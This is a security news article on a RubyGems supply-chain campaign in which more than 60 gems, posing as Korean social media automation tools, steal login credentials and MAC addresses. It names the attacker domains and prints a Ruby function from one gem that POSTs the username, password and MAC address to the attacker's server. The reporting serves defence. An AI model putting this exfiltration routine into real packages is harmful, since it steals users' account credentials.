RubyGems Malware Attack Weaponizes 60+ Packages to Steal Credentials from Social Media and Marketing Tools

Threat actors began slipping malicious code into legitimate RubyGems packages, disguising infostealers as social media automation tools in early 2023.

Over the past two years, attackers operating under aliases such as zon, nowon, kwonsoonje, and soonje have published more than 60 gems that deliver promised automation features—bulk posting, engagement amplification, and backlink creation—while covertly harvesting credentials.

These packages target platforms including Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver, and have been downloaded over 275,000 times, with installs persisting on machines long after individual gems are removed from the public index.

Socket.dev analysts noted that each malicious gem incorporates a lightweight graphical interface built with Glimmer-DSL-LibUI, presented in Korean to appeal to South Korean grey-hat marketers.

Upon launch, users encounter prompts labeled “아이디” (ID) and “비밀번호” (password), encouraging entry of account credentials under the guise of legitimate login for automation services.

Instead of forwarding these details to official APIs, the gems immediately exfiltrate credentials and host MAC addresses to attacker-controlled servers via HTTP POST requests.

The domains programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr, and seven1.iwinv[.]net host PHP bulletin board endpoints that silently accept stolen data.

The campaign’s evolution demonstrates a sophisticated supply chain compromise. Gems published under the zon alias are often “yanked”—removed from RubyGems—within days, only to be mirrored in continuous integration caches and redistributed under new names by the same actor.

Despite periodic infrastructure shifts, the core credential-stealing routine remains unchanged, enabling persistent fingerprinting of infected hosts.

This approach leverages grey-hat marketers’ reliance on disposable accounts; victims rarely report breaches, opting instead to abandon compromised identities and continue operations without suspicion.

Infection Mechanism and Exfiltration Workflow

The malicious iuz-64bit gem exemplifies the infection mechanism shared across the cluster.

After presenting its GUI, the gem invokes a function that collects user input and system identifiers before performing an HTTP POST to the attacker’s C2 endpoint.

The defanged Ruby snippet below illustrates the process:-

def login_check2(user_id, user_pw)
  url="https://programzon.com/auth/program/signin"  # C2 endpoint
  headers = { 'Content-Type' => 'application/json' }
  mac     = get_mac_address()
  body    = {
    username:   user_id,
    password:   user_pw,
    macAddress: mac,
    program:    '인스타 자동 포스팅(업로드) 프로그램'
  }.to_json
  response = HTTP.post(url, headers: headers, body: body)
  payload  = JSON.parse(response.body.to_s)
  payload['status'] == "0" ? "0" : payload['message']
end

Once credentials and MAC addresses reach the C2 server, the attacker can correlate installations across various gem clusters, track tool distribution, and maintain long-term access.

This dual-use model empowers grey-hat marketers to automate spam and SEO campaigns while surreptitiously funneling sensitive data to the threat actor.

As the campaign persists, defenders must integrate real-time dependency scanning and install-time alerts to detect and block these malicious packages before they infiltrate development environments.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial